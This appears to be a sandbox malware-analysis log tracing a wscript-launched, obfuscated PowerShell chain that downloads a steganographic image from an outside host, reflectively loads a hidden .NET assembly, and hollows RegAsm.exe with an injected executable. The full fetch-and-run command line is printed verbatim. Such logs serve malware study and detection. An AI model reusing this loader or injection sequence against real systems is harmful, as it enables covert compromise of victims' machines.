('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Process injection Process 2272 resumed a thread in remote process 2680
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000035c
suspend_count: 1
process_identifier: 2680
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2140
thread_handle: 0x000002f8
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

NtResumeThread

thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2136
1 0 0

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x00000588
suspend_count: 1
process_identifier: 2272
1 0 0

CreateProcessInternalW

thread_identifier: 2684
thread_handle: 0x0000035c
process_identifier: 2680
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000384
1 1 0

NtGetContextThread

thread_handle: 0x0000035c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 1499136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000384
1 0 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x004c7000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: dpLæLÿÿÿÿÿÿÿÿÿÿÿÿNl±¿DNæ@»u˜DPDPÀàDÿÿÿÿàKMtˆM,‹MĈM|‹M‰M̋MX‰MŒMœ‰MTŒMà‰M˜ŒM$ŠM܌M¬ŠMdMhŠM MD…M äOØP ÙOäP ½OðPÈOüP «OP¶OP¤O P ÏOÿÿÿÿ<±M ÿÿÿÿÿÿÿÿÿÿÿÿ€  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ8¬MPPPPPPP¸®M8°M©MÐP°PC   8¬M:±M¤P´?P´?P´?P´?P´?P´?P´?P´?P´?P¨P¸?P¸?P¸?P¸?P¸?P¸?P¸?PPP..þÿÿÿ “PSTPDTPSTPDTÈ P PH PÈ Pÿÿÿÿÿÿÿÿþÿÿÿè¤M.?AVbad_exception@std@@è¤M.?AVexception@std@@è¤M.?AVtype_info@@
base_address: 0x00500000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: VëI
base_address: 0x00505000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00506000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:   ^[^è£ÛÞ!&079< #7:RT <?@Cwy¯² \^…‡™›ËÍIK´á!$  ), %);>MPqtÆÉ8;FI "14;>UX§ª=@WZ©¬69 "'
base_address: 0x00507000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00508000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00563000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2680
process_handle: 0x00000384
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4843558
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000035c
process_identifier: 2680
1 0 0

NtResumeThread

thread_handle: 0x0000035c
suspend_count: 1
process_identifier: 2680
1 0 0

NtResumeThread

thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x000001b0
suspend_count: 1
process_identifier: 2680
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe